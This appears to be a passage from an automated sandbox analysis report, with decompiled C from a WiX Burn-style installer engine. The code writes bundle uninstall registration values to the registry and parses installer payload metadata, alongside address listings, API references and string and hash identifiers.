                                                                                                                                                                  																															}
                                                                                                                                                                  																														}
                                                                                                                                                                  																													} else {
                                                                                                                                                                  																														_t186 = E004329C8(_v8, L"NoRemove",  *((intOrPtr*)(_t185 + 0x90)));
                                                                                                                                                                  																														__eflags = _t186;
                                                                                                                                                                  																														if(_t186 >= 0) {
                                                                                                                                                                  																															goto L72;
                                                                                                                                                                  																														} else {
                                                                                                                                                                  																															_push(L"NoRemove");
                                                                                                                                                                  																															goto L95;
                                                                                                                                                                  																														}
                                                                                                                                                                  																													}
                                                                                                                                                                  																												} else {
                                                                                                                                                                  																													_push(L"NoModify");
                                                                                                                                                                  																													goto L95;
                                                                                                                                                                  																												}
                                                                                                                                                                  																											}
                                                                                                                                                                  																										} else {
                                                                                                                                                                  																											_t186 = E00432A16(_t182, _v8, L"Contact", _t147);
                                                                                                                                                                  																											__eflags = _t186;
                                                                                                                                                                  																											if(_t186 >= 0) {
                                                                                                                                                                  																												goto L61;
                                                                                                                                                                  																											} else {
                                                                                                                                                                  																												_push(L"Contact");
                                                                                                                                                                  																												goto L95;
                                                                                                                                                                  																											}
                                                                                                                                                                  																										}
                                                                                                                                                                  																									} else {
                                                                                                                                                                  																										_t186 = E00432A16(_t182, _v8, L"Comments", _t146);
                                                                                                                                                                  																										__eflags = _t186;
                                                                                                                                                                  																										if(_t186 >= 0) {
                                                                                                                                                                  																											goto L58;
                                                                                                                                                                  																										} else {
                                                                                                                                                                  																											_push(L"Comments");
                                                                                                                                                                  																											goto L95;
                                                                                                                                                                  																										}
                                                                                                                                                                  																									}
                                                                                                                                                                  																								} else {
                                                                                                                                                                  																									_t186 = E00432A16(_t182, _v8, L"ParentDisplayName",  *(_t185 + 0x7c));
                                                                                                                                                                  																									__eflags = _t186;
                                                                                                                                                                  																									if(_t186 >= 0) {
                                                                                                                                                                  																										_t186 = E00432A16(_t182, _v8, L"ParentKeyName",  *(_t185 + 0x7c));
                                                                                                                                                                  																										__eflags = _t186;
                                                                                                                                                                  																										if(_t186 >= 0) {
                                                                                                                                                                  																											goto L55;
                                                                                                                                                                  																										} else {
                                                                                                                                                                  																											_push(L"ParentKeyName");
                                                                                                                                                                  																											goto L95;
                                                                                                                                                                  																										}
                                                                                                                                                                  																									} else {
                                                                                                                                                                  																										_push(L"ParentDisplayName");
                                                                                                                                                                  																										goto L95;
                                                                                                                                                                  																									}
                                                                                                                                                                  																								}
                                                                                                                                                                  																							} else {
                                                                                                                                                                  																								_t186 = E00432A16(_t182, _v8, L"URLUpdateInfo",  *(_t185 + 0x78));
                                                                                                                                                                  																								__eflags = _t186;
                                                                                                                                                                  																								if(_t186 >= 0) {
                                                                                                                                                                  																									goto L50;
                                                                                                                                                                  																								} else {
                                                                                                                                                                  																									_push(L"URLUpdateInfo");
                                                                                                                                                                  																									goto L95;
                                                                                                                                                                  																								}
                                                                                                                                                                  																							}
                                                                                                                                                                  																						} else {
                                                                                                                                                                  																							_t186 = E00432A16(_t182, _v8, L"URLInfoAbout",  *(_t185 + 0x74));
                                                                                                                                                                  																							__eflags = _t186;
                                                                                                                                                                  																							if(_t186 >= 0) {
                                                                                                                                                                  																								goto L47;
                                                                                                                                                                  																							} else {
                                                                                                                                                                  																								_push(L"URLInfoAbout");
                                                                                                                                                                  																								goto L95;
                                                                                                                                                                  																							}
                                                                                                                                                                  																						}
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						_t186 = E00432A16(_t182, _v8, L"HelpTelephone",  *(_t185 + 0x70));
                                                                                                                                                                  																						__eflags = _t186;
                                                                                                                                                                  																						if(_t186 >= 0) {
                                                                                                                                                                  																							goto L44;
                                                                                                                                                                  																						} else {
                                                                                                                                                                  																							_push(L"HelpTelephone");
                                                                                                                                                                  																							goto L95;
                                                                                                                                                                  																						}
                                                                                                                                                                  																					}
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					_t186 = E00432A16(_t182, _v8, L"HelpLink",  *(_t185 + 0x6c));
                                                                                                                                                                  																					__eflags = _t186;
                                                                                                                                                                  																					if(_t186 >= 0) {
                                                                                                                                                                  																						goto L41;
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						_push(L"HelpLink");
                                                                                                                                                                  																						goto L95;
                                                                                                                                                                  																					}
                                                                                                                                                                  																				}
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				_t186 = E00432A16(_t182, _v8, L"Publisher",  *(_t185 + 0x68));
                                                                                                                                                                  																				__eflags = _t186;
                                                                                                                                                                  																				if(_t186 >= 0) {
                                                                                                                                                                  																					goto L38;
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					_push(L"Publisher");
                                                                                                                                                                  																					goto L95;
                                                                                                                                                                  																				}
                                                                                                                                                                  																			}
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_t186 = E00432A16(_t182, _v8, L"DisplayVersion",  *(_t185 + 0x64));
                                                                                                                                                                  																			__eflags = _t186;
                                                                                                                                                                  																			if(_t186 >= 0) {
                                                                                                                                                                  																				goto L35;
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				_push(L"DisplayVersion");
                                                                                                                                                                  																				goto L95;
                                                                                                                                                                  																			}
                                                                                                                                                                  																		}
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		_push(L"DisplayName");
                                                                                                                                                                  																		goto L95;
                                                                                                                                                                  																	}
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_push(L"DisplayIcon");
                                                                                                                                                                  																	goto L95;
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_push(L"EngineVersion");
                                                                                                                                                                  																goto L95;
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t186 = E00432A16(_t182, _v8, L"BundleTag",  *(_t185 + 0x10));
                                                                                                                                                                  															__eflags = _t186;
                                                                                                                                                                  															if(_t186 >= 0) {
                                                                                                                                                                  																goto L24;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_push(L"BundleTag");
                                                                                                                                                                  																goto L95;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t186 = E00432A16(_t182, _v8, L"BundleProviderKey",  *(_t185 + 0x44));
                                                                                                                                                                  														__eflags = _t186;
                                                                                                                                                                  														if(_t186 >= 0) {
                                                                                                                                                                  															goto L21;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_push(L"BundleProviderKey");
                                                                                                                                                                  															goto L95;
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_push(L"BundleVersion");
                                                                                                                                                                  													goto L95;
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push(L"BundlePatchCode");
                                                                                                                                                                  												goto L95;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push(L"BundleDetectCode");
                                                                                                                                                                  											goto L95;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push(L"BundleAddonCode");
                                                                                                                                                                  										goto L95;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push(L"BundleUpgradeCode");
                                                                                                                                                                  									goto L95;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push(L"BundleCachePath");
                                                                                                                                                                  								L95:
                                                                                                                                                                  								_push("Failed to write %ls value.");
                                                                                                                                                                  								goto L96;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to create registration key.");
                                                                                                                                                                  						L102:
                                                                                                                                                                  						_push(_t186);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t186 = E004135A7(_t177, _t185,  *_t185,  *((intOrPtr*)(_t185 + 0x48)),  *((intOrPtr*)(_t185 + 0xc)), _a16 + 4, _a4);
                                                                                                                                                                  					if(_t186 >= 0) {
                                                                                                                                                                  						goto L3;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push(_a4);
                                                                                                                                                                  						_push("Failed to cache bundle from path: %ls");
                                                                                                                                                                  						L96:
                                                                                                                                                                  						_push(_t186);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					RegCloseKey(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t186;
                                                                                                                                                                  			}





















                                                                                                                                                                  0x0040adfe
                                                                                                                                                                  0x0040ae1d
                                                                                                                                                                  0x0040ae1f
                                                                                                                                                                  0x0040ae21
                                                                                                                                                                  0x0040ae40
                                                                                                                                                                  0x0040ae42
                                                                                                                                                                  0x0040ae44
                                                                                                                                                                  0x0040ae63
                                                                                                                                                                  0x0040ae65
                                                                                                                                                                  0x0040ae67
                                                                                                                                                                  0x0040ae73
                                                                                                                                                                  0x0040ae76
                                                                                                                                                                  0x0040ae7c
                                                                                                                                                                  0x0040ae7d
                                                                                                                                                                  0x0040ae7f
                                                                                                                                                                  0x0040ae89
                                                                                                                                                                  0x0040ae8d
                                                                                                                                                                  0x0040ae8e
                                                                                                                                                                  0x0040ae91
                                                                                                                                                                  0x0040aea7
                                                                                                                                                                  0x0040aea9
                                                                                                                                                                  0x0040aeac
                                                                                                                                                                  0x0040aeae
                                                                                                                                                                  0x0040aeba
                                                                                                                                                                  0x0040aebd
                                                                                                                                                                  0x0040aedf
                                                                                                                                                                  0x0040aedf
                                                                                                                                                                  0x0040aee2
                                                                                                                                                                  0x0040af04
                                                                                                                                                                  0x0040af1b
                                                                                                                                                                  0x0040af1d
                                                                                                                                                                  0x0040af20
                                                                                                                                                                  0x0040af22
                                                                                                                                                                  0x0040af43
                                                                                                                                                                  0x0040af45
                                                                                                                                                                  0x0040af48
                                                                                                                                                                  0x0040af4a
                                                                                                                                                                  0x0040af5e
                                                                                                                                                                  0x0040af63
                                                                                                                                                                  0x0040af65
                                                                                                                                                                  0x0040af68
                                                                                                                                                                  0x0040af6a
                                                                                                                                                                  0x0040af6a
                                                                                                                                                                  0x0040af7b
                                                                                                                                                                  0x0040af7d
                                                                                                                                                                  0x0040af7f
                                                                                                                                                                  0x0040af8b
                                                                                                                                                                  0x0040af8e
                                                                                                                                                                  0x0040afb0
                                                                                                                                                                  0x0040afb0
                                                                                                                                                                  0x0040afb3
                                                                                                                                                                  0x0040afd5
                                                                                                                                                                  0x0040afd5
                                                                                                                                                                  0x0040afd8
                                                                                                                                                                  0x0040affa
                                                                                                                                                                  0x0040affa
                                                                                                                                                                  0x0040affd
                                                                                                                                                                  0x0040b01f
                                                                                                                                                                  0x0040b01f
                                                                                                                                                                  0x0040b022
                                                                                                                                                                  0x0040b044
                                                                                                                                                                  0x0040b044
                                                                                                                                                                  0x0040b047
                                                                                                                                                                  0x0040b069
                                                                                                                                                                  0x0040b069
                                                                                                                                                                  0x0040b06c
                                                                                                                                                                  0x0040b0ae
                                                                                                                                                                  0x0040b0ae
                                                                                                                                                                  0x0040b0b4
                                                                                                                                                                  0x0040b0b6
                                                                                                                                                                  0x0040b0d6
                                                                                                                                                                  0x0040b0d6
                                                                                                                                                                  0x0040b0dc
                                                                                                                                                                  0x0040b0de
                                                                                                                                                                  0x0040b0fe
                                                                                                                                                                  0x0040b0fe
                                                                                                                                                                  0x0040b104
                                                                                                                                                                  0x0040b107
                                                                                                                                                                  0x0040b127
                                                                                                                                                                  0x0040b12a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b12c
                                                                                                                                                                  0x0040b141
                                                                                                                                                                  0x0040b143
                                                                                                                                                                  0x0040b146
                                                                                                                                                                  0x0040b148
                                                                                                                                                                  0x0040b163
                                                                                                                                                                  0x0040b165
                                                                                                                                                                  0x0040b167
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b169
                                                                                                                                                                  0x0040b169
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b169
                                                                                                                                                                  0x0040b14a
                                                                                                                                                                  0x0040b14a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b14a
                                                                                                                                                                  0x0040b148
                                                                                                                                                                  0x0040b109
                                                                                                                                                                  0x0040b117
                                                                                                                                                                  0x0040b119
                                                                                                                                                                  0x0040b11b
                                                                                                                                                                  0x0040b173
                                                                                                                                                                  0x0040b173
                                                                                                                                                                  0x0040b179
                                                                                                                                                                  0x0040b19e
                                                                                                                                                                  0x0040b19e
                                                                                                                                                                  0x0040b1a1
                                                                                                                                                                  0x0040b1c2
                                                                                                                                                                  0x0040b1d7
                                                                                                                                                                  0x0040b1d9
                                                                                                                                                                  0x0040b1dc
                                                                                                                                                                  0x0040b1de
                                                                                                                                                                  0x0040b1ea
                                                                                                                                                                  0x0040b1f1
                                                                                                                                                                  0x0040b1fb
                                                                                                                                                                  0x0040b1fe
                                                                                                                                                                  0x0040b214
                                                                                                                                                                  0x0040b216
                                                                                                                                                                  0x0040b219
                                                                                                                                                                  0x0040b21b
                                                                                                                                                                  0x0040b227
                                                                                                                                                                  0x0040b22d
                                                                                                                                                                  0x0040b24d
                                                                                                                                                                  0x0040b24d
                                                                                                                                                                  0x0040b253
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b255
                                                                                                                                                                  0x0040b25e
                                                                                                                                                                  0x0040b260
                                                                                                                                                                  0x0040b262
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b264
                                                                                                                                                                  0x0040b264
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b264
                                                                                                                                                                  0x0040b262
                                                                                                                                                                  0x0040b22f
                                                                                                                                                                  0x0040b22f
                                                                                                                                                                  0x0040b23d
                                                                                                                                                                  0x0040b23f
                                                                                                                                                                  0x0040b241
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b243
                                                                                                                                                                  0x0040b243
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b243
                                                                                                                                                                  0x0040b241
                                                                                                                                                                  0x0040b21d
                                                                                                                                                                  0x0040b21d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b21d
                                                                                                                                                                  0x0040b1e0
                                                                                                                                                                  0x0040b1e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b1e0
                                                                                                                                                                  0x0040b1a3
                                                                                                                                                                  0x0040b1b2
                                                                                                                                                                  0x0040b1b4
                                                                                                                                                                  0x0040b1b6
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,000000B8,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 0040B310
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.8.1128.0$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString
                                                                                                                                                                  • API String ID: 3535843008-4072303632
                                                                                                                                                                  • Opcode ID: 6f772b43b939d12f2b4750acb2bef13707333ee0d49179c94ec53917455393f6
                                                                                                                                                                  • Instruction ID: 0974e1a9faa4fc9fc413f9a5ed9bedf608dbe9382fae2f725bff0c0e3d2fe0c4
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f772b43b939d12f2b4750acb2bef13707333ee0d49179c94ec53917455393f6
                                                                                                                                                                  • Instruction Fuzzy Hash: 34E17431E40726B7DB22AA50DE06F6E7661FB08710F20017BF910B62A1D77DAD21A7CD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E00407FA7(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				intOrPtr* _t92;
                                                                                                                                                                  				intOrPtr _t102;
                                                                                                                                                                  				signed int _t103;
                                                                                                                                                                  				int _t113;
                                                                                                                                                                  				signed int _t136;
                                                                                                                                                                  				intOrPtr* _t157;
                                                                                                                                                                  				signed int _t160;
                                                                                                                                                                  				signed int _t161;
                                                                                                                                                                  				intOrPtr _t162;
                                                                                                                                                                  				intOrPtr* _t165;
                                                                                                                                                                  				void* _t175;
                                                                                                                                                                  				intOrPtr _t176;
                                                                                                                                                                  
                                                                                                                                                                  				_v20 = _v20 & 0x00000000;
                                                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                                                  				_v16 = _v16 & 0x00000000;
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t176 = E00435FBE(_a16, L"Payload",  &_v20);
                                                                                                                                                                  				if(_t176 >= 0) {
                                                                                                                                                                  					_t92 = _v20;
                                                                                                                                                                  					_t176 =  *((intOrPtr*)( *_t92 + 0x20))(_t92,  &_v16);
                                                                                                                                                                  					if(_t176 >= 0) {
                                                                                                                                                                  						_t94 = _v16;
                                                                                                                                                                  						if(_v16 != 0) {
                                                                                                                                                                  							_t102 = E00431078(_t94 * 0x58, 1);
                                                                                                                                                                  							_t157 = _a4;
                                                                                                                                                                  							 *_t157 = _t102;
                                                                                                                                                                  							if(_t102 != 0) {
                                                                                                                                                                  								_t103 = _v16;
                                                                                                                                                                  								_a16 = _a16 & 0x00000000;
                                                                                                                                                                  								 *((intOrPtr*)(_t157 + 4)) = _t103;
                                                                                                                                                                  								if(_t103 == 0) {
                                                                                                                                                                  									L50:
                                                                                                                                                                  									_t176 = 0;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t162 = 0;
                                                                                                                                                                  									_a4 = 0;
                                                                                                                                                                  									while(1) {
                                                                                                                                                                  										_t175 =  *_t157 + _t162;
                                                                                                                                                                  										_t176 = E00435F1D(_t162, _v20,  &_v12, 0);
                                                                                                                                                                  										if(_t176 < 0) {
                                                                                                                                                                  											break;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t176 = E00435B5E(_v12, L"Id", _t175);
                                                                                                                                                                  										if(_t176 < 0) {
                                                                                                                                                                  											_push("Failed to get @Id.");
                                                                                                                                                                  											goto L81;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t176 = E00435B5E(_v12, L"FilePath", _t175 + 0x18);
                                                                                                                                                                  											if(_t176 < 0) {
                                                                                                                                                                  												_push("Failed to get @FilePath.");
                                                                                                                                                                  												goto L81;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t176 = E00435B5E(_v12, L"Packaging",  &_v8);
                                                                                                                                                                  												if(_t176 < 0) {
                                                                                                                                                                  													_push("Failed to get @Packaging.");
                                                                                                                                                                  													goto L81;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"download", 0xffffffff) != 2) {
                                                                                                                                                                  														_t113 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"embedded", 0xffffffff);
                                                                                                                                                                  														if(_t113 != 2) {
                                                                                                                                                                  															if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"external", 0xffffffff) != 2) {
                                                                                                                                                                  																_push(_v8);
                                                                                                                                                                  																_t176 = 0x80070057;
                                                                                                                                                                  																_push("Invalid value for @Packaging: %ls");
                                                                                                                                                                  																goto L76;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																 *(_t175 + 4) = 3;
                                                                                                                                                                  																goto L20;
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															 *(_t175 + 4) = _t113;
                                                                                                                                                                  															goto L20;
                                                                                                                                                                  														}
                                                                                                                                                                  													} else {
                                                                                                                                                                  														 *(_t175 + 4) = 1;
                                                                                                                                                                  														L20:
                                                                                                                                                                  														if(_a8 == 0) {
                                                                                                                                                                  															L25:
                                                                                                                                                                  															_t176 = E00435D6C(_t162, _v12, L"LayoutOnly", _t175 + 8);
                                                                                                                                                                  															if(_t176 == 0x80070490 || _t176 >= 0) {
                                                                                                                                                                  																_t176 = E00435B5E(_v12, L"SourcePath", _t175 + 0x38);
                                                                                                                                                                  																if(_t176 != 0x80070490 ||  *(_t175 + 4) != 1) {
                                                                                                                                                                  																	if(_t176 < 0) {
                                                                                                                                                                  																		_push("Failed to get @SourcePath.");
                                                                                                                                                                  																		goto L81;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		goto L30;
                                                                                                                                                                  																	}
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	L30:
                                                                                                                                                                  																	_t176 = E00435B5E(_v12, L"DownloadUrl", _t175 + 0x40);
                                                                                                                                                                  																	if(_t176 != 0x80070490 ||  *(_t175 + 4) == 1) {
                                                                                                                                                                  																		if(_t176 < 0) {
                                                                                                                                                                  																			_push("Failed to get @DownloadUrl.");
                                                                                                                                                                  																			goto L81;
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			goto L33;
                                                                                                                                                                  																		}
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		L33:
                                                                                                                                                                  																		_t176 = E00435B5E(_v12, L"FileSize",  &_v8);
                                                                                                                                                                  																		if(_t176 == 0x80070490) {
                                                                                                                                                                  																			L36:
                                                                                                                                                                  																			_t176 = E00435B5E(_v12, L"CertificateRootPublicKeyIdentifier",  &_v8);
                                                                                                                                                                  																			if(_t176 == 0x80070490) {
                                                                                                                                                                  																				L39:
                                                                                                                                                                  																				_t176 = E00435B5E(_v12, L"CertificateRootThumbprint",  &_v8);
                                                                                                                                                                  																				if(_t176 == 0x80070490) {
                                                                                                                                                                  																					L42:
                                                                                                                                                                  																					_t176 = E00435B5E(_v12, L"Hash",  &_v8);
                                                                                                                                                                  																					if(_t176 < 0) {
                                                                                                                                                                  																						_push("Failed to get @Hash.");
                                                                                                                                                                  																						goto L81;
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						_t176 = E00433E39(_t162, _v8, _t175 + 0x30, _t175 + 0x34);
                                                                                                                                                                  																						if(_t176 < 0) {
                                                                                                                                                                  																							_push("Failed to hex decode the Payload/@Hash.");
                                                                                                                                                                  																							goto L81;
                                                                                                                                                                  																						} else {
                                                                                                                                                                  																							_t176 = E00435B5E(_v12, L"Catalog",  &_v8);
                                                                                                                                                                  																							if(_t176 == 0x80070490) {
                                                                                                                                                                  																								L47:
                                                                                                                                                                  																								_t165 = _v12;
                                                                                                                                                                  																								if(_t165 != 0) {
                                                                                                                                                                  																									 *((intOrPtr*)( *_t165 + 8))(_t165);
                                                                                                                                                                  																									_v12 = _v12 & 0x00000000;
                                                                                                                                                                  																								}
                                                                                                                                                                  																								_t136 = _a16 + 1;
                                                                                                                                                                  																								_t162 = _a4 + 0x58;
                                                                                                                                                                  																								_a16 = _t136;
                                                                                                                                                                  																								_a4 = _t162;
                                                                                                                                                                  																								if(_t136 < _v16) {
                                                                                                                                                                  																									continue;
                                                                                                                                                                  																								} else {
                                                                                                                                                                  																									goto L50;
                                                                                                                                                                  																								}
                                                                                                                                                                  																							} else {
                                                                                                                                                                  																								if(_t176 < 0) {
                                                                                                                                                                  																									_push("Failed to get @Catalog.");
                                                                                                                                                                  																									goto L81;
                                                                                                                                                                  																								} else {
                                                                                                                                                                  																									_t176 = E00407A56(_t162, _a12, _v8, _t175 + 0x1c);
                                                                                                                                                                  																									if(_t176 < 0) {
                                                                                                                                                                  																										_push("Failed to find catalog.");
                                                                                                                                                                  																										goto L81;
                                                                                                                                                                  																									} else {
                                                                                                                                                                  																										goto L47;
                                                                                                                                                                  																									}
                                                                                                                                                                  																								}
                                                                                                                                                                  																							}
                                                                                                                                                                  																						}
                                                                                                                                                                  																					}
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					if(_t176 < 0) {
                                                                                                                                                                  																						_push("Failed to get @CertificateRootThumbprint.");
                                                                                                                                                                  																						goto L81;
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						_t176 = E00433E39(_t162, _v8, _t175 + 0x28, _t175 + 0x2c);
                                                                                                                                                                  																						if(_t176 < 0) {
                                                                                                                                                                  																							_push("Failed to hex decode @CertificateRootThumbprint.");
                                                                                                                                                                  																							goto L81;
                                                                                                                                                                  																						} else {
                                                                                                                                                                  																							goto L42;
                                                                                                                                                                  																						}
                                                                                                                                                                  																					}
                                                                                                                                                                  																				}
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				if(_t176 < 0) {
                                                                                                                                                                  																					_push("Failed to get @CertificateRootPublicKeyIdentifier.");
                                                                                                                                                                  																					goto L81;
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					_t176 = E00433E39(_t162, _v8, _t175 + 0x20, _t175 + 0x24);
                                                                                                                                                                  																					if(_t176 < 0) {
                                                                                                                                                                  																						_push("Failed to hex decode @CertificateRootPublicKeyIdentifier.");
                                                                                                                                                                  																						goto L81;
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						goto L39;
                                                                                                                                                                  																					}
                                                                                                                                                                  																				}
                                                                                                                                                                  																			}
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			if(_t176 < 0) {
                                                                                                                                                                  																				_push("Failed to get @FileSize.");
                                                                                                                                                                  																				goto L81;
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				_t176 = E0043472D(_v8, 0, _t175 + 0x10);
                                                                                                                                                                  																				if(_t176 < 0) {
                                                                                                                                                                  																					_push("Failed to parse @FileSize.");
                                                                                                                                                                  																					goto L81;
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					goto L36;
                                                                                                                                                                  																				}
                                                                                                                                                                  																			}
                                                                                                                                                                  																		}
                                                                                                                                                                  																	}
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_push("Failed to get @LayoutOnly.");
                                                                                                                                                                  																goto L81;
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t176 = E00435B5E(_v12, L"Container",  &_v8);
                                                                                                                                                                  															if(_t176 != 0x80070490 ||  *(_t175 + 4) == 2) {
                                                                                                                                                                  																if(_t176 < 0) {
                                                                                                                                                                  																	_push("Failed to get @Container.");
                                                                                                                                                                  																	L81:
                                                                                                                                                                  																	_push(_t176);
                                                                                                                                                                  																	E00430A57();
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_t176 = E00418EC8(_t162, _a8, _v8, _t175 + 0x3c);
                                                                                                                                                                  																	if(_t176 < 0) {
                                                                                                                                                                  																		_push(_v8);
                                                                                                                                                                  																		_push("Failed to to find container: %ls");
                                                                                                                                                                  																		L76:
                                                                                                                                                                  																		_push(_t176);
                                                                                                                                                                  																		E00430A57();
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		goto L25;
                                                                                                                                                                  																	}
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																goto L25;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L51;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to get next node.");
                                                                                                                                                                  									goto L81;
                                                                                                                                                                  								}
                                                                                                                                                                  								L51:
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t176 = 0x8007000e;
                                                                                                                                                                  								E004300D9(_t102, "payload.cpp", 0x39, 0x8007000e);
                                                                                                                                                                  								_push("Failed to allocate memory for payload structs.");
                                                                                                                                                                  								_push(0x8007000e);
                                                                                                                                                                  								E00430A57();
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to get payload node count.");
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to select payload nodes.");
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_push(_t176);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				_t160 = _v20;
                                                                                                                                                                  				if(_t160 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t160 + 8))(_t160);
                                                                                                                                                                  				}
